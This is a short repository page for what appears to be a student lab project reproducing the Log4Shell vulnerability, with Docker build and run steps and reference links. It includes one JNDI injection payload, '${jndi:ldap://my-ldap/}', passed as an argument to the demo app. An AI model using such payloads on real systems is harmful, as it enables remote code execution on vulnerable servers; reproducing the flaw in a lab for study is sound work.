You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
1.7 KiB
1.7 KiB
SR2I203
Log4Shell
Usage
To run this app, you need to install docker, then run :
docker build -t app . docker run app my-arg
For example you can now try to inject some jndi script:
docker run app '${jndi:ldap://my-ldap/}'
Overview Resources
- Base repo
- LiveOverflow:
- A Journey From JNDI/LDAP Manipulation to Remote Code Execution Dream Land
- Flow Diagram
- Impact